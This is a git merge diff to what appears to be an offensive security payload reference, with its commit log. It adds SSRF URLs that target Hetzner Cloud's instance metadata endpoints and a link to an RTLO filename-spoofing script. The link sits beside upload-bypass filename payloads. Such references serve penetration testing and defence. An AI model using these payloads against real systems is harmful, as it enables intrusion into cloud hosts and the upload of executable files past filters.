Merge 4f4d7b3bf5 into 293723d49d

Merge pull request #712 from bsysop/patch-4
Adding "Hetzner Cloud" to the Summary
2024-05-09 15:56:15 +02:00 · 2024-04-06 13:07:08 +04:00 · 2024-04-05 18:55:52 +02:00 · 2024-04-05 11:55:54 -03:00 · 2024-04-05 15:53:05 +02:00 · 2024-04-04 23:43:34 -03:00
2 changed files with 15 additions and 2 deletions
--- a/Forgery/README.md
+++ b/Forgery/README.md
@ -52,6 +52,7 @@
  * [SSRF URL for Oracle Cloud](#ssrf-url-for-oracle-cloud)
  * [SSRF URL for Kubernetes ETCD](#ssrf-url-for-kubernetes-etcd)
  * [SSRF URL for Alibaba](#ssrf-url-for-alibaba)
+  * [SSRF URL for Hetzner Cloud](#ssrf-url-for-hetzner-cloud)
  * [SSRF URL for Docker](#ssrf-url-for-docker)
  * [SSRF URL for Rancher](#ssrf-url-for-rancher)

@ -805,6 +806,18 @@ http://100.100.100.200/latest/meta-data/instance-id
 http://100.100.100.200/latest/meta-data/image-id
 ```

+### SSRF URL for Hetzner Cloud
+
+```powershell
+http://169.254.169.254/hetzner/v1/metadata
+http://169.254.169.254/hetzner/v1/metadata/hostname
+http://169.254.169.254/hetzner/v1/metadata/instance-id
+http://169.254.169.254/hetzner/v1/metadata/public-ipv4
+http://169.254.169.254/hetzner/v1/metadata/private-networks
+http://169.254.169.254/hetzner/v1/metadata/availability-zone
+http://169.254.169.254/hetzner/v1/metadata/region
+```
+
 ### SSRF URL for Kubernetes ETCD

 Can contain API keys and internal ip and ports
--- a/Files/README.md
+++ b/Files/README.md
@ -80,7 +80,7 @@
        * `file.php%20`
        * `file.php%0d%0a.jpg`
        * `file.php%0a`
-    * Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`.
+    * Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`. - [Automated Script for RTLO](https://github.com/GainSec/RTLOify)
    * Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp`
    * Multiple special characters: `file.jsp/././././.`
 - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
@ -219,4 +219,4 @@ Upload the XML file to `$JETTY_BASE/webapps/`
 * [Jetty Features for Hacking Web Apps - September 15, 2022 - Mikhail Klyuchnikov](https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/)
 * [Inyección de código en imágenes subidas y tratadas con PHP-GD  - Spanish Resource - hackplayers](https://www.hackplayers.com/2020/03/inyeccion-de-codigo-en-imagenes-php-gd.html)
 * [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
-* [PHP Internals Book - THE .PHPT FILE STRUCTURE](https://www.phpinternalsbook.com/tests/phpt_file_structure.html)
+* [PHP Internals Book - THE .PHPT FILE STRUCTURE](https://www.phpinternalsbook.com/tests/phpt_file_structure.html)
Author	SHA1	Message	Date
J-GainSec	c42a6d126f	Merge `4f4d7b3bf5` into `293723d49d`	2024-04-06 13:07:08 +04:00
Swissky	293723d49d	Merge pull request #712 from bsysop/patch-4 Adding "Hetzner Cloud" to the Summary	2024-04-05 18:55:52 +02:00
bsysop	dc461f170e	Adding "Hetzner Cloud" to the Summary	2024-04-05 11:55:54 -03:00
Swissky	9571306b9f	Merge pull request #711 from bsysop/patch-3 Adding Hetzner Cloud Metadata URL	2024-04-05 15:53:05 +02:00
bsysop	3c9fdec3da	Adding Hetzner Cloud Metadata URL https://docs.hetzner.cloud/#server-metadata	2024-04-04 23:43:34 -03:00
J-GainSec	4f4d7b3bf5	Added Link to Python Script for adding RTLO characters to strings, individual files or all files within a directory.	2024-03-01 23:36:14 -05:00